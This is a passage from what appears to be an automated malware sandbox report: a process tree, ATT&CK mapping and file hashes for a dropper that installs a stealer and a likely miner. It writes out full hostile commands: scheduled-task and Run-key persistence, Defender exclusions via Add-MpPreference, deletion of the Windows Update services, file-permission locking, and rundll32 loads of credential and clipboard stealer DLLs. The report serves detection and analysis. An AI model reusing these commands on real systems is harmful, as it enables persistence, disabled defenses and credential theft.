wrote to memory of 1952 1616 1534.exe 116 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1616 wrote to memory of 1952 1616 1534.exe 116 PID 1124 wrote to memory of 4544 1124 cmd.exe 111 PID 1124 wrote to memory of 4544 1124 cmd.exe 111 PID 1124 wrote to memory of 4544 1124 cmd.exe 111 PID 1124 wrote to memory of 648 1124 cmd.exe 113 PID 1124 wrote to memory of 648 1124 cmd.exe 113 PID 1124 wrote to memory of 648 1124 cmd.exe 113 PID 1124 wrote to memory of 3760 1124 cmd.exe 115 PID 1124 wrote to memory of 3760 1124 cmd.exe 115 PID 1124 wrote to memory of 3760 1124 cmd.exe 115 PID 1952 wrote to memory of 4716 1952 1534.exe 117 PID 1952 wrote to memory of 4716 1952 1534.exe 117 PID 1952 wrote to memory of 4716 1952 1534.exe 117 PID 1124 wrote to memory of 5044 1124 cmd.exe 122 PID 1124 wrote to memory of 5044 1124 cmd.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4196
-
-
C:\Users\Admin\AppData\Local\Temp\E777.exeC:\Users\Admin\AppData\Local\Temp\E777.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\E8CF.exeC:\Users\Admin\AppData\Local\Temp\E8CF.exe2⤵
- Executes dropped EXE
PID:1188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 3403⤵
- Program crash
PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FEC9.exeC:\Users\Admin\AppData\Local\Temp\FEC9.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:884
-
-
C:\Users\Admin\AppData\Local\Temp\22.exeC:\Users\Admin\AppData\Local\Temp\22.exe2⤵
- Executes dropped EXE
PID:1052 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 3403⤵
- Program crash
PID:2188
-
-
-
C:\Users\Admin\AppData\Local\Temp\A06.exeC:\Users\Admin\AppData\Local\Temp\A06.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F5⤵
- Creates scheduled task(s)
PID:2120
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:4544
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"6⤵PID:648
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E6⤵PID:3760
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E6⤵PID:628
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"6⤵PID:2276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:5044
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
PID:460 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main6⤵
- Loads dropped DLL
PID:3548 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3548 -s 6447⤵
- Program crash
PID:2420
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main5⤵
- Loads dropped DLL
PID:1520
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"3⤵
- Executes dropped EXE
PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\133F.exeC:\Users\Admin\AppData\Local\Temp\133F.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Executes dropped EXE
PID:3688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 15123⤵
- Program crash
PID:2824
-
-
-
C:\Users\Admin\AppData\Local\Temp\1534.exeC:\Users\Admin\AppData\Local\Temp\1534.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\1534.exeC:\Users\Admin\AppData\Local\Temp\1534.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\8f6628f7-6678-4ef6-b538-a8a2f4db0cc0" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:4716
-
-
C:\Users\Admin\AppData\Local\Temp\1534.exe"C:\Users\Admin\AppData\Local\Temp\1534.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\1534.exe"C:\Users\Admin\AppData\Local\Temp\1534.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Checks computer location settings
- Executes dropped EXE
PID:2688 -
C:\Users\Admin\AppData\Local\f41694bd-fca6-4335-a228-3bd134fac16b\build3.exe"C:\Users\Admin\AppData\Local\f41694bd-fca6-4335-a228-3bd134fac16b\build3.exe"6⤵
- Executes dropped EXE
PID:1388 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:3728
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\523E.exeC:\Users\Admin\AppData\Local\Temp\523E.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1976 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 23043⤵
- Program crash
PID:2496
-
-
-
C:\Users\Admin\AppData\Local\Temp\68B5.exeC:\Users\Admin\AppData\Local\Temp\68B5.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1232 -
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
PID:4416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 7043⤵
- Program crash
PID:1532
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4852
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4876
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1012
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1964
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5012
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2176
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1108
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2860
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3656
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:220
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2148
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4016
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5044
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2260
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3120
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4120
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4092
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3852
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:704
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1864
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3452
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵PID:1992
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:3728
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2068
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:4108
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:876
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4620
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1136
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2204
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1428
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1912
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1048
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:2976
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3364
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3832
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3100
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4520
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4608
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3352
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1208
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2384
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3068
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:808
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
PID:2188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1188 -ip 11881⤵PID:3852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1052 -ip 10521⤵PID:1388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4740 -ip 47401⤵PID:4316
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:2616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1976 -ip 19761⤵PID:3920
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1204 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:968 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:5060
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1232 -ip 12321⤵PID:1868
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 3548 -ip 35481⤵PID:932
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:688
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
PID:3944 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
PID:1636
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
2Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize2KB
MD5e5b1cc0ae5af6a8277d75cff4af2c5e8
SHA14768fff3d4bbe02f89683b4a0e7b15b24b54eb9f
SHA256d950c0d748aae641d71b11cd1c519b289917c23bee1a2b6bc5c496fd8e5d4655
SHA51257a4737deeefac0124d73b52525993fecbbebd21a556ece87f8e79e845e07f037abb5e49f7458e8a010935c6691f18fbb913d77ecfb2ba902067788c483ec3d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize1KB
MD53adac03b181d7980568dda0da0efc9de
SHA1a283c4c9bd26a65b8240d21708e57f5946778341
SHA25624c4973ced938b77d9670ac79eb76cd52411b17ab59ec78ba14c1b433f342933
SHA5126fbd2a32fc18606628ea56311764cd879a1196405dddd4d269ad6163b2ffdcf916786f1c0328f27ec089be5cb9b4ecb3542363f4dfb3df1c1b91a0e038b67241
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize488B
MD5fe6d96dbed1ea10005f5fd35f4dcb146
SHA178c9f371bc17e30cd894c51ebe74a48e1fe7b779
SHA2565d58012d239442acde4127a871a150de64760cad4a5db6ce97af47dff291e626
SHA512aa786803e8f8cd3cc563ec210464d95b4de334dab971ff4d69cd355817276d2822e339803337969be60004ac5ed95ab20be36b44fcd6d4d80c9cf55544e9535b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize482B
MD5c976850fb91ef87464b5d64decdcde6b
SHA149387294b32548db33b4a5469fd4de7c8fb6e264
SHA2562258b17e0e5f9c4d7e67e96b3e670b53fc962f8b70daa9736af97cadccae8b3b
SHA512ef6f7ad2e1c1fed4beac9347cd44444c798d6e16dfdac854ad0575c8cbd8026d07782050f9fb9e740349d0572b2ef95f85143bf9212db9832e60fb4729bfc0b3
-
Filesize
759KB
MD5f194ac765ef33c0ea9492348021eddc3
SHA11d821007587e84e9516a3c6cfc6d05221e728614
SHA256b8f105a2506e754dc7504e9f44714d5c5550fcb723e589dc70ed5d5e1de4559d
SHA5122276dbcdad0c6c6ca3a7afce80b809da613150166b0e842a090d7a063ca902c9b5b5fbad718710f61aa096b3a1503237b66cd130cdcb4358791db8273cc54d94
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
1KB
MD57165d1b9fd1ae46063c336fd4133d20a
SHA17753b95417d8f6a0b31843db2284aaeea8a2f67e
SHA256be3e660b1dce210f9ee874725ccf4c91e8b66ee1af34326fba74f17327a0478d
SHA512eff15ca037dbd9a994eafeb6d3136cb41396698d41184e1c9e53ab7614f8cac65f80cbde60dbcffcb2e328033e66653fbbb5f3c8fc7e61b4e3f74db1e3f307fb
-
Filesize
4.5MB
MD5369e7a430bab9b7a043b5ea1bd1496b2
SHA123eb3090bc77349f079ef516024bac184c9afdcf
SHA25678b695c863e73f5bf4578d440dd5f109af68e8a6b76984bded546650045f5cb3
SHA51227204fabb8903eaba505cb0b08c0d3e19bb3fa9c02846bf45969009d112345f67a2d12b6a755d448db5a315fbb965c260ed7eafaaae052a777028745ea7aa2e3
-
Filesize
4.5MB
MD5369e7a430bab9b7a043b5ea1bd1496b2
SHA123eb3090bc77349f079ef516024bac184c9afdcf
SHA25678b695c863e73f5bf4578d440dd5f109af68e8a6b76984bded546650045f5cb3
SHA51227204fabb8903eaba505cb0b08c0d3e19bb3fa9c02846bf45969009d112345f67a2d12b6a755d448db5a315fbb965c260ed7eafaaae052a777028745ea7aa2e3
-
Filesize
759KB
MD5f194ac765ef33c0ea9492348021eddc3
SHA11d821007587e84e9516a3c6cfc6d05221e728614
SHA256b8f105a2506e754dc7504e9f44714d5c5550fcb723e589dc70ed5d5e1de4559d
SHA5122276dbcdad0c6c6ca3a7afce80b809da613150166b0e842a090d7a063ca902c9b5b5fbad718710f61aa096b3a1503237b66cd130cdcb4358791db8273cc54d94
-
Filesize
759KB
MD5f194ac765ef33c0ea9492348021eddc3
SHA11d821007587e84e9516a3c6cfc6d05221e728614
SHA256b8f105a2506e754dc7504e9f44714d5c5550fcb723e589dc70ed5d5e1de4559d
SHA5122276dbcdad0c6c6ca3a7afce80b809da613150166b0e842a090d7a063ca902c9b5b5fbad718710f61aa096b3a1503237b66cd130cdcb4358791db8273cc54d94
-
Filesize
759KB
MD5f194ac765ef33c0ea9492348021eddc3
